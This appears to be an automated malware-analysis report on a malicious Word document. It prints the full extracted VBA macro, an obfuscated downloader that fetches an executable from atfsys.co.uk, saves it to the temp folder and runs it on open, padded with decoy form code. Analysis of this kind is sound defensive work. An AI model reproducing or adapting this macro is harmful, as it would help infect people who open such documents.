MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is triggered upon opening, which uses 'CallByName' to execute a function that constructs and downloads a payload from the URL "http://atfsys.co.uk/9/01.exe". This indicates a macro-based downloader attack, likely delivered via spearphishing.
Heuristics 4
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4634 bytes |
SHA-256: 1a47b8a74763bbf4048f66d1d10c5f67c1f189c2a19225950b8789b04024f86c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function CategoriseField(FieldName As String) As String
Dim Category As String
Category = "Undefined"
Dim CatBnd As Integer, FieldBnd As Integer, CatItr As Integer, FieldItr As Integer
Dim ThisField As String
CatBnd = UBound(FieldHeadings, 1)
For CatItr = 0 To CatBnd
FieldBnd = UBound(FieldHeadings(CatItr, 1)(1), 1)
For FieldItr = 0 To FieldBnd
ThisField = FieldHeadings(CatItr, 1)(1)(FieldItr)
If ThisField = FieldName Then
Category = FieldHeadings(CatItr, 0)
CategoriseField = Category
Exit For
End If
Next FieldItr
If CategoriseField = Category Then
Exit For
End If
Next CatItr
' If AddControl = "AddControl" Then
' Select Case Category
'
'
' End If
End Function
Sub URTniRUwGB()
EDc1mFJHKrRm0 = Chr(61) & Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(60) & Chr(47) & Chr(97) & Chr(116) & Chr(102) & "x" & Chr(115) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & "s" & Chr(46) & "c" & Chr(111) & Chr(46) & "u" & "k" & "/" & Chr(57) & "9" & Chr(47) & Chr(48) & Chr(49) & "." & Chr(59) & "e" & Chr(120) & Chr(101)
Dim kljhnIOH As String
kljhnIOH = "M" & Chr(105) & Chr(99) & Chr(114) & Chr(61) & "o" & "s" & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(59) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(60) & "T" & Chr(84) & "P"
For DGxsbHsZ = 59 To 61
kljhnIOH = Replace(kljhnIOH, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set KgJquztrTap = VvC0OQ6h8(kljhnIOH)
For DGxsbHsZ = 59 To 61
EDc1mFJHKrRm0 = Replace(EDc1mFJHKrRm0, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
CallByName KgJquztrTap, "O" & "p" & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), EDc1mFJHKrRm0, False
Dim EJJFEF As String
EJJFEF = "W" & Chr(83) & Chr(99) & Chr(60) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & "." & Chr(59) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(61) & Chr(108)
For DGxsbHsZ = 59 To 61
EJJFEF = Replace(EJJFEF, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Set SmuuuU81PmD = VvC0OQ6h8(EJJFEF)
Set K2BAN3ePSzEUUZ = CallByName(SmuuuU81PmD, Chr(69) & Chr(110) & "v" & Chr(105) & "r" & "o" & Chr(110) & Chr(109) & Chr(101) & Chr(110) & "t", VbGet, Chr(80) & Chr(114) & Chr(111) & "c" & "e" & Chr(115) & Chr(115))
YYRGHi07Vig = K2BAN3ePSzEUUZ("T" & "E" & Chr(77) & Chr(80))
Iw1u5AAHYx = YYRGHi07Vig & "\" & "d" & "i" & "k" & Chr(111) & Chr(61) & Chr(112) & Chr(105) & Chr(114) & Chr(116) & "." & Chr(60) & "e" & Chr(59) & Chr(120) & "e"
For DGxsbHsZ = 59 To 61
Iw1u5AAHYx = Replace(Iw1u5AAHYx, Chr(DGxsbHsZ), "", 1, 1, vbTextCompare)
Next DGxsbHsZ
Dim pI78nXO4LvafL7() As Byte
CallByName KgJquztrTap, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
pI78nXO4LvafL7 = CallByName(KgJquztrTap, "r" & Chr(101) & "s" & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & "d" & Chr(121), VbGet)
Ajh6bff8yWYHO pI78nXO4LvafL7, Iw1u5AAHYx
On Error GoTo ZIyC6gTRQV
a = 233 / 0
On Error GoTo 0
O1pmpYMO:
Exit Sub
ZIyC6gTRQV:
NvPfGv8GF2j 33, "mt0ja19PZDhQ4k", "dvEWVewvwe"
Resume O1pmpYMO
End Sub
Sub AddToEntryForm_Deprecated(ListOfFields As Variant, Optional Category As String, Optional SampleNum As Integer)
Dim CurrentField As Variant, CurrFieldName As String, CurrFieldCat As String
For Each CurrentField In ListOfFields
CurrFieldName = ListOfFields()()
CurrFieldCat = CategoriseField(CurrFieldName)
Select Case CurrFieldCat
Case "Description":
' Consider SampleNum to return Frame to add control to
' NewEntry_frm.Description_frame.Controls.Add
'Function to return controls on multipage
'Function to populate multipage with all controls
'Consider adding management page for validations
'Override
'Shade non-applicable fields//& hide?
' Add to desc frame Description_Frame
''''//
'Add to all multipage objects according to site restriction | Replicate when adding more samples
End Select
Next CurrentField
End Sub
Sub ShowAllFields()
End Sub
Attribute VB_Name = "Module2"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.